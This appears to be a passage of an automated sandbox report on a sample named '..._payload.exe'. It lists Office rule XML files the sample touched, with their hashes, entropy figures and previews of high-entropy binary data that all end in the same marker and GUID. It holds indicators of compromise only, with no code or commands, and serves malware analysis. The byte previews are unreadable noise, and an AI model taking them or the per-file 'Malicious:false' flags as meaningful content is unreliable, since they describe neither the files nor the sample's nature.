                                                                                                                                                                      Preview:<?xml.r3....c.k.nH."..........G..K.Yq...1.*q.&}.`).D.{..F...n..?}...k%.#.......P.6#.N.M..E.9..$.. ... .o..<>._k(b.:.}...j.....e.=..PoV....... |x....P..`C;I...|.w`...A...v.#.hDRlS.q.a...a.P._A...Rm..ut@..;.d....R-...k......O.Zv...\.`.....\k.@4.D...{y..R.;.......g.?-..... .........Nc.|.@E.T}...6.%SV....hztm....gc.(]B.PU........l%.;..:...5...,..N..m..^..6{.......(6w.]?...t...&...q%..W..j.^.IKN..^..H.vB...pza$.{..P.z...w......%6O..o.#I.(.....(.[i.......,"...&W4.At.?...+.$0..G.........V....7....y..?.1.......@W'%M...2.:a.....?.z.q..e3.1$..D..}.......;.....n....UpO#%.E..,j.....r.s6..f...g...@..'...8.D.@....<.9...o..{.<..u...........[g.:H|iC.XyL?..V;.6.?cB?..gg..Q..b>.m....u.M.h...&"t.YxZ...y..<Um....i.M5._0....\..mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120649v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):749
                                                                                                                                                                      Entropy (8bit):7.772616909960976
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:12:LAxoH9bBKKUeNrg5YBeOZMKCMVm7A1dxMo+GKCu67WVSbgXa5PuqDNSUdNcii9a:Hb5Nr/vYomcvJKCu5SUMv82bD
                                                                                                                                                                      MD5:5471C91C6C55C09D4F9D7A6C9CFEEE5E
                                                                                                                                                                      SHA1:F86D132E5BBFFA517B60C3A835AD688C0A58F40A
                                                                                                                                                                      SHA-256:B5D48D89994DD518D65E6CB2E4234B83CEFED3B45D547C82A66824D0F85D170B
                                                                                                                                                                      SHA-512:35BADBB1D9964918B038932F9CC6748E858EF92FADB27DF4AD937FDD875C023CE97D1B0AE53A8C2B9392E7DB3C6CCE35713F5EEBAE526919995BCE80204A49AB
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml[.....?O.`B.......)sdhf..O.,)M.dsc...~.&..z._..j.....O:....W..5.J.\.. 5t0u|Z.@....`.9.g4......%@.........^...*.....6.+.......V..o.,wY...n..m.u!G..m.q!.[p.w..%.Q-V...sIL..T.$x...c...-...7...k!..Dr.."v.D.k9...:....f....f.Kn.H..9....].].........y).S...Q.P...Q..8..=.?.2k.....5N.g.v.Z5F7G..R...d.....2..C.K.......ws.Ea...=.N`....l.fH#...W6y!O.O.......`k1..#"....i{.....PB..4.......z.......LI.j8..........._D.....P`......d.L...Zhq......S.*....e.T...^.C)..4-..$.....%pw.............{#Bt..4....U.W:T...v.Z../k@cD..}hc./.....U....;..........R...C......z..&../...P!u..].$.k._..p......W...S....\.Y.-..j.S.K..!A..:..;....2xrg...".Y*&u..n]smMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120650v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):812
                                                                                                                                                                      Entropy (8bit):7.7522904396358605
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:12:sN+2mwy3tEwU7mowUdIyS2ZOVjdNxgdlELv4/OCXNiUxjZcc7XyXSUdNcii9a:kO3ir7mouyS2ZeJslEj4lUUxlcgCC2bD
                                                                                                                                                                      MD5:69A6DA871BE5A464899B52DF0CE6DAD0
                                                                                                                                                                      SHA1:8D505C1A029758271C42E4D787DCFEF513014789
                                                                                                                                                                      SHA-256:135BEF63954BF58A1DDE28A908F026272269D35E6C9B7CE20B2C84B9217A0979
                                                                                                                                                                      SHA-512:4C51E70AB031E19E87380B83E96B8C92F1FA89F9992B7CACF2779CCB97366F9728A36AC58B1D21DBEAA0102DF1B05EA79EAB47EFD90146E777A0D0E9C38E5076
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml..aA......y.p...s.P..y......y....fg[.r..(...6I....n..(B;..>.#.jo...FK.{.Wt...,..uvl>w.<.\H..t..,.$..8.E.....G}.....X....'kR%..G..X.L6.......k|...L.:8Y....x...l.me..].0`......ep....k.}8..m.6....uQ&..^.....I.........F....W.+.E^....U...lZ:U.....C+_..l|.....T.)!T...>.=.L.....=..L.Y.J.}...D..SaB...a...H\+$Z.......I....o.N.xD.....y\.A&.........F...D.#..DRu.0..9.6..... ...... Sc...J=J,x......n{.s..m...`f.....w..,...3.RX...3..H.....mm.I......6...F.&...h. .*".._.........[.....l;..i8...g[....~M.k.9.g..T..$....x.....=..jN..k;.Y.... \..&..@L.s.J.x.6..b...!F...c....F...X.......`...G..9.....3\....O.u#..2...M.9...h.N.h;..(.]2w..Cz.4.;7!.Ier...2[.....Zs....$........ZgP9..l.?..'.&....Y.ymMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120651v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):748
                                                                                                                                                                      Entropy (8bit):7.715987428189836
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:12:Zu9mhJI1DK9CGV89vfdcYpzPsCrrAEVKRXwyA/8aMKNARmij9GRXIzkqqRjoMSUn:gaDV2VVUrEsA/8TlD9zIjM2bD
                                                                                                                                                                      MD5:FF9FB50A48C9045387466F722ECDB30D
                                                                                                                                                                      SHA1:0387C7E6DE9ECE9C9A9AE5E5F78D0DDC716D6817
                                                                                                                                                                      SHA-256:B2AAE47E14DF823B6D520EF513B564003E1DEDC883240E00F3A6203E9A143FD9
                                                                                                                                                                      SHA-512:CCBB78C5A75E6767495E0B482FB69963C5833BCB4BD76FB3F0833336013290E625F8E8C05F5E358EB35C554A9E5FA28FD49F9D4CDB2B7E93A8B97026EA68EF42
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml......b..Y.`J....<7.iq?.FF6..H&jD:7\o.!Ah.f...6..Y..x....:....eN..^s^>..._.T.3.~.>...v......7.i..k......;,:...wK..S..&.U.....9nQ.C`...4..\6....>U:....L....P._)a!;d`O.e...AT...K.fx<-Re.Y.:)p.......3..Q.j.....=.8.N2.M.....U.@.&..0*e...0..]. ....y^.Nq..:..T.D.*.:.A.....3m...X.........j/.)...@6.B.>.U.;w\....B.V....".e..W...i>...VD.4y..r...#8.,!....."|..R...3S..N..YY...1E/o..+.&........IB>1<...5.........)O.y..(m3,.T............).n\..a.2c[...y_...j..+..7.Y..J...O.M.o....Q.T.:.~w..1U..4....1..st.*b(@..0H;.Z;......`....BL.e..[.... ......?^ ...[..p.y3.P=5e.T.0.b4.E....'x..@.Rs$.]O......'w..;...uf?.A.^...}..x...*....m....>.....?.mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120652v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):804
                                                                                                                                                                      Entropy (8bit):7.722340185754409
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:H9znN6o2IWzTcA0Xj6bgZMmySCDeGY2bD:6vIWz6jxSmJGBD
                                                                                                                                                                      MD5:C133D095BE164D5AED16C38720209E97
                                                                                                                                                                      SHA1:0E646621E2AFD447AA22D3E412255B65AB75FE02
                                                                                                                                                                      SHA-256:F15C020B5572053CA587E6F66D69F17184902E0EDD3C622CB76FE75986BAE1BA
                                                                                                                                                                      SHA-512:84709169549DEE9431446CF27BA539B4274BF965321CF1111009E7554693DA102F9435B3F5C52722A4AB25F6AC3499EBF773EA5ADEE881DAE514272C6F62C3AF
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xmlGZ.Kf:........'.@.W..nr..pVa..da&..b...S.L..R.CsQl.`...B}%.2p$.u9...07.<r.......0>.W.....Zy...&>>......;U...@...J/6..FR.e..&...;.....P...%MBi..|..%4....qO"#.X..s..(.....<l...Y}...m.....:..Q..b}*5^.......b..Zx..(.#.k....X.r.;7._.D..f.0....?.q&)|.".......$.7[.x...$.....B...e.,...g.~=.l.....}}...0...+...Q....xN..xD....s...g....K=.{..0.GC........N.ew...X..`.........4......W......+..7......BE.....4..........[..E.K.0.?.$.3....2u..#.....x.\z..l-...I.J..[....Y../.C.j.{.....8.y...uz.N.v...a..A..G./..O..#P..z.'..d...@.i.j"..)....?..0.3*.=....<.A..5..P...........=..c............TM.<*I.4.z4M+..*J.RW.:]CL...!.|......F.....=..=N..@....o.y......X-C.(.TP.f}..x..t.............s....s..h.lUmMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120653v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):752
                                                                                                                                                                      Entropy (8bit):7.71038968783709
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:12:xMRElFnKwGNM9spZZVI09d3rDashYBpq5sFBYTheLOP8pWSegqsAzSUdNcii9a:xMRELKW9spW09teBpl3LOP8pWSegt72X
                                                                                                                                                                      MD5:6EF57BFEC623EE7241BA2CDA225ECB05
                                                                                                                                                                      SHA1:81D3D942E2EC968E3B199B4DE1319264C510519B
                                                                                                                                                                      SHA-256:E0D746D17D4CC05D4C7A3BB5087B5A8ED7A2FDC749ED98394A472B8A1FF63DE0
                                                                                                                                                                      SHA-512:8E5EC09D2939D5EA127047E6F48C4C0E2176CE693980B796CA887D4C3AF60CA09D8258843C2D4E921D9053221A3B9D525A2B67C2A36A6505EA8506CAA14642C2
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml.R....a.+@J.)..^....7n..:G..M^..<(.7.8r..|..../a.....k.b[!.%".Q..u.R.....+n.. a(..mB...u....L.......3....7...W. .;...\...a6...5.,.a..Lf-f.(.#O.......*.......).zk..#..uF....._......uZ.)...3........qW...@W...sP..Ti%.."..J'e`....}g...y>..'>..}w..;lqu {!..U&.X..)...i..!`.B..^.V..3.Ew8w'+.%.o. .=$u..h...4..}N..3.n7.}.eZ.^.D..*.........(.T....7...BU.9..6\l..du.338.r.^?.&.....].J...$.*g<....1LTLS2T.z.......*.........g.R..,.'...2.o..?..lx<E<....=..z.E...kI....4f.x.n(.lf...sz......{..x..4.&..Y....G...9yb.b...Az..O{H`f...\...R..M_`...|.....)/2+......:..1K....K..~.Y.....<..8 ......Pc~.8.n.b....].]\.F.{.....X.....hqU.X....m....^z.q4..1.Q..8mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120654v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):810
                                                                                                                                                                      Entropy (8bit):7.703973566228996
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:cViWOmfArggPX2sdBxB024ftxSFM0eMsvaeM2bD:YNtiPGUe24CY1SwD
                                                                                                                                                                      MD5:398B8E5749B366F14A8501FEE31C362D
                                                                                                                                                                      SHA1:B99DE9B88BAAF49E484AE3A32FD0AB80AB99F98D
                                                                                                                                                                      SHA-256:4B10AB73AF29FE15E410AC0E6FC05B8F3388EA3E7413D617A77DD342E2F911A9
                                                                                                                                                                      SHA-512:BF8C14987FA677E4C8A451A161D537DA298CE703192F9507C98ED988E1384143BFC0D95AC30F8C1E588599C812D6E9128B668A6B5B7C337FFE8A3AFCA7906F76
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml....)..w."..m S........m.J'Gs.\E.7.K.e..w-:.5s.l*.2e...&7..j.H..*6,..b,2I.:.F~..,,..M......"q.r.l.8u.Z.../.kf..t......'P...1...PU.!S9q.V.:..~.Gk...H.+C...x..W.......F.2..X.Noc...^..t+...XI..y.zU.@GQ.w.~y.&D..+..F.f.m....A....i.//"...#.^.......3 .>.7.[l..k..V..^..........r.:.3#..'A.:....f.=hMB...%....D=.R..V...e%\>.E..._k....bm..+.D.s".M'x$...0..l.. .O..A+p...hv.jE.....NMEJ.. ...H....~.{nBIB9Z.9y......A....7...{.wT~...!.Y....a..95..d.R.4.i...M.t......A.4s..,.p.A..Qed....8.$p....gi../u_sa.....9gE$..YK@.g.*%.._..91....xk...kI.a..8...i}...G.|]..5K...c[..V.K..YY.R=s.(..W.f.....q....A=....:.N..B...|K.1U5._)>.w.K1..t'..<.@c..x.C.......q.....i................].*....O.d...*.......M...=.mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120655v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):752
                                                                                                                                                                      Entropy (8bit):7.760368157152874
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:12:hFpReOj8EvCnFHzB4l29cO3SCw8CSjoIDMruB/AduyZO7Jz3mlqSeL/SUdNcii9a:hFpRjMnFHqsV3SCR3MrY/Z79UTeLa2bD
                                                                                                                                                                      MD5:F37E626DA0107A070464BC50946F09C7
                                                                                                                                                                      SHA1:E7CC8F11B0412FC0012B4FED8F35ACA7406C5FA8
                                                                                                                                                                      SHA-256:03BF11064AD868D5E698A5B2E5558A96ADF7EED27E5BDF17B2B608449B8E391F
                                                                                                                                                                      SHA-512:6A050D69F9F6AF368C1C5B57855C7DA34C058E3B821572FDB12B00B038F657FD6A7E8FDC234B4901C6F704ABB90836B125E10495743ECC630E62BB42B1CC0D1B
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml2.....R~.+....%4...}s...o.r.|.Y..Q.....,7(.N.......w..#'dXk..@....W......W.W....}.......e..$...........y_.._P..$$(.....(Q$:....(1.. ..}.q.....:.9......]..BCY.....K-36o.m..,..0.,..hT)QB..C.( ....*....T2'......^.....y....L18.O..:.L_5Y..or3X..}J...j.e`=V.R....M......6..!N}J..8.......R_:6..|..Y.!..b..<O...%...]w.t.......|.........I)i]~..@...../j.uA.oZ.S2....... ]...$...&...V6&Y.s.S\....M./b.l%.1x.2O.....sM{.=...4..g..=<...b.W.qj..L..........-....mn..l..,.5.W@e....O&.......1.z..+.V....i..k3..*..\9.r.]..7i.C.....5..;;>n..g3'i..W.y.dKF.g>v+2..u........4.~P...it..`.Y.P/..=.95...........6"<bP..LI.+.epHae]......vw..`&U^]."$....'.`...}H;mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120656v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):810
                                                                                                                                                                      Entropy (8bit):7.729378124826939
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:12:c1z5fjVbOdGkkCDZFRtq8t01ln7cKN57kLXQW+rArRvA6YesL4lhUEAPSUdNciik:wzbbmGkkCFvtQ7cK4gW+rYtld92bD
                                                                                                                                                                      MD5:02D2DD6C0D4B04D74DABCF0CFFB3B49C
                                                                                                                                                                      SHA1:51FA6669C8B6728052E485C230FDCC624A68DF52
                                                                                                                                                                      SHA-256:FA87AB452766879F69B753FCED4FD157AA668011DE6FA2E3FEB0504AF1DA1BBE
                                                                                                                                                                      SHA-512:46253AD35C0B6E7BC9BDF13DAB8E4925EA5D7537E842F31602C60DA650434070AA9829651129CFE3EAD67159F582692274C23CA4CD3AEC7FDE2F3303B3B12888
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml!U.0.h..&x"y.<.fmr..nN.l..-..s!.D7[s.bO.........piH..f..."3.....tne.I.%...;T..NIK|P.....O....v.RK}...pO.vbe.~.~..7.^;.SKt..80#.U3...2.I.W...5.XeG.H..O.!O..$.B.@:.._...4...b..%..R.2U.'..........M...l.....o.x.....2k..:......<.....0...a..}.aZ"=.u8ih..c..M"..Q......`..6N...%.....t.f...Sn...3....F......w0X...r.H.)..~.........;...WG`[.F...[]Qh....R...N...b..m.~T.\..'.co}...:.fS.5"._9A.i.w.<.y......"...2....d....%..h....."X..c...KA.x.W....a..4X.B.........s3U....fne8.CK..3SQ..+~INt.....F.".H..........![.Ly$.|.)C.BVE..K[P4h..1+G.....mC...x...b.....z.......5...jUW.`.Au..H:......k...].\.lG....K,oX.2>.v...DM.{.8..p.@-.}K .X..H.5B....g.H.@t@...3...^.uw..J^.=C+vUP...2..T..,.(..-....I-$..q....H..mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120657v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):752
                                                                                                                                                                      Entropy (8bit):7.675695477262421
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:12:BtcDzj6NZXXxUZW+6l6odRxIVozQSI5JRpoihb/eF6NrLkgp75Fn2kYaMMo0SUdV:pNZXBAWIyJIxSF62e7r2ke2bD
                                                                                                                                                                      MD5:6A06471B0500F2581D9339D2C16C169C
                                                                                                                                                                      SHA1:CEE783C89DD9445AB90A111ED704FFE0498F638F
                                                                                                                                                                      SHA-256:54A2C0E2388B41A8E734AED7487FABDE43719685843EA9C14352F7605B64D404
                                                                                                                                                                      SHA-512:413E2216FBD1138C4F55B3946BD2091AB4CB94DAF244D2537ABBDFF39C5272F2120E5DECB9AB4D4143CF3F78007AF1B75535986A4497C09F5C594573780B26FC
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xmlll.......d..4.....x..:..8GLK.hJ....V3.......c.DG{ ..|.t.CUR...*....x......>BK..[.G.b..#.we..t..9..C...lVi.'.....d.....Z.tZ{......#.K.....h.u...#..`.8........v.?.N.M....z...8/&..zOo...(su._)X+.F..S.wUe.i..~&..~..u...L\$.m.._....75.~..e............v..6}..m..c.......3^..!.....Yv.j...}.....o.?....0.Y....s..h...GIv........8..{../v.?.m-....Xo.l.L.R...K....:..fbb...v....t.m.&.o$.!......".t@...O..L..............0.......x.2.H.\1..c..,.;E.....S*<0.... .3.@@..\M.\..D.^*l.|......l.."...RWG...2...]4_.3...1.O..z.........A{..v.SO x...s..........M..P.-9fuNb...~.k....?.S.El.o-....+......_......sd..K.S..=..@....J...Uy.....Xr..k.).)....a(...mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120658v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):805
                                                                                                                                                                      Entropy (8bit):7.715831549073305
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:12:vCHodX3u0SdocA2yT6XZeuVroV2KZWlTJg/5gHDaPOTeYUpxmHN7vno5dUWZ5Pyy:n53/cNy2XVVrOdRSaWT0K7vnkLyB2bD
                                                                                                                                                                      MD5:689D103F80121424C9791EFB4842516C
                                                                                                                                                                      SHA1:7CEA8211DF7C906B47716B7A0543C50CF2B170BD
                                                                                                                                                                      SHA-256:A38DC29BCA7745F5A4572D7C66DBA11EC2440ADB0902204E437AFE4A7A81A304
                                                                                                                                                                      SHA-512:A327E6034E1BE8D3C3D2DF1D0BF619C6E15F8D58CF175011EABAD72B7F15B84D339F621624DA7B135806005A16CC34171E016C5D1FEBD13AEF64A037A3726849
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml........g......?.d.....W.1Fy...R*.|QWF..B...... .]%.K...<`.......`.El.......N.....7..z.T.8.zXb.E@...=.&.%...}DM...#..5.ub[.....i;..Ga..V.b..:%;.Q!fUCC.xn.}-=...&....|..7.....5z.Zd...~.....#..s8o.C+_..U...[.T.+.k....]0O...D4..d]x...D&t.yKQ....3...M...:1;a=...~F{..s..BP..p!...V$k1.!2F..Z .....n..B......5.....zb'..wt..K.".3..Hp .2'Fu>#VBL.)'Oa..)..UM=..w....0k......`(.......!.6.u...<..Mp.....o].j<y..).]...Rb.W..$...?x..>..H.Qm...l..p..kF....-..Ab...."s.a..l...q..=)..n.G.5.A......uh1.o..i.$.......pS8!...`..OW.e.TNhlbj/.:C..@!...#....k....l..Dp.M.._...;..i..KYg.H..Xj...0.cM.........0....$..(...v#..O=....r.4...e..-..l...9....lVq..R.GF........h.dn.....7'R...r.z25K..w.i...:....Dt$>..F...CF ...mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120659v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):801
                                                                                                                                                                      Entropy (8bit):7.742120005525982
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:6snc0vKb6IJNJBjBUss0T400MDkQNf2bD:64c0ijfz7T4+w08D
                                                                                                                                                                      MD5:FC459483E78260B8EEDEA13EB87B52B8
                                                                                                                                                                      SHA1:167EE19B5517809D0B738E90C606324D303906A9
                                                                                                                                                                      SHA-256:137DED25A228D7FF4339F3D81B84BB093821A976D0E6714BD30592CE8C819684
                                                                                                                                                                      SHA-512:E391E133738C25066F4490D31B96FFC2F994D737AA7AE020B5652D230AA5FF3B1C30D8883B5FA80571463C12EE84BD3714CDF3B979447C4329027885296EB86C
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xmlI....(\..../.S.d.xq...RI.wX;..X......O.C...c...&..d..&@...8.N..}.].#.=.-.A..|?...b2...0*F....0..F..j..L..J.v...N.<3...aNTe..MR.V.i.....q .<e.I.,.oR%...=:.Y....<G.......y..o.......I;.).......!|)s382...R.I.Hq.E.F?h.....Oe.LD..AOK..|.z.n.~$. ).?&..%.N+.a^..v.Z..v....8.l...2..,...k..[b.?.?..........n..!...-......L..t....WJ......u.=b.H.....+/.r.}m-.D.}...<..J..:..J....W...+....iS.nC.......L.|....(Y}.....4.a:..f.....e.....o].......%o..*u..\g...N..X;.(.W.C....{.....=..c.p....^...py\.U.N.........w....}.RD.?s...WHL.`..[.l~.......'...Zc|2.;..e.0..b.."T..zq.....b.~e.dk.A......{..Bs.m@........q$..*Ns(!..1t4^K.2..x.........j*....C...?8.Y..DE...W[VT.`db..x.$.r...J.2VMT.3....z\P.mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120660v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):818
                                                                                                                                                                      Entropy (8bit):7.719530151675438
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:+e/UrFw402L/qIVDqZxKjLrh/Si2uwA9vM2bD:+FaoLCIVsghr2uwO3D
                                                                                                                                                                      MD5:A8472F85B6E4688282BCF55DB2F0F386
                                                                                                                                                                      SHA1:9773E3ACCB765FBE13766DE32114315335E1A8CF
                                                                                                                                                                      SHA-256:7A90F7B5915A9381F8EABE57D335AD89F80F6E854F3FB1C02DF17D0ED57561EF
                                                                                                                                                                      SHA-512:065DB54AAFEDAD85849B31BF6F5EB273510254BF696B75D9F60100D740DFE09641638C5C6727AF25BAE7FAE62D8ED3487D01EBF3E52FE81EDC669512F1D66DBA
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml......a..[./.n.b.....H.. .....+..t.;.....,J..?jr...SA.?.Qm&.1.QM.....6Y.Q)I}.x.....?0:..I.J...V...r.....J\XS..-...b....6J..2.b..r.U).[.E.[...../...=......4....W..=X@.W....g...1.p....wLY.....s:...o9....P;Q...`..whp!....s.O.F.h.4f......3........A.%..#.;.....f..g.....1.....T. i..\...}-KR!..Y.].fe...J,......;......y..\...%r..=..U...n......mw.n1..S..B..X!N@.....#.U@f"\...ex~........d.9$.>E..A4...."t.s.[!.BA...o..y..5..0...xc7P|.Wx7|.....f......1Szn!8].EFG+a......#-.M..b AU.^o..a.*.(9v...A....KB/f..8`.p..z..l.&.O/]v05t..Z0..^..pteEw.3.E|.j....o.. ....F.?..l.....j.....g...............8Rr...}.>.!.lU..52o.....S.u.../d8.Vj.w"fP..a.be.}.....N.i/..@...&~.Af...I..`..........%.....-..f..W9....h.?..%'mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120661v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):744
                                                                                                                                                                      Entropy (8bit):7.723038701015318
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:12:Eo8WH/iudMcJeIOlAbB1w7XEngd42wFDxadtDpNwiU5ZMZz/PXSUdNcii9a:HhheIfB1wzEgd43FDsFDwN7GHC2bD
                                                                                                                                                                      MD5:CCA46D723D2806F5FC17AD59BC8075BB
                                                                                                                                                                      SHA1:D451F535601B69F80E488170A067E3D12F86F173
                                                                                                                                                                      SHA-256:9160B30D8E835100637E8AA8FBF0029927C9BD6F5BA4A5A0F38D0EC8AE836BD2
                                                                                                                                                                      SHA-512:6EE4C12DC7C6ACDBF072A195E3D6F98B315C1064329713663D0D30397A343CD90BF73CF7F2D46ED78AC421739BC31ECF8EDEBA09C0CD6850C1D18222CF8DC3B0
                                                                                                                                                                      Malicious:false
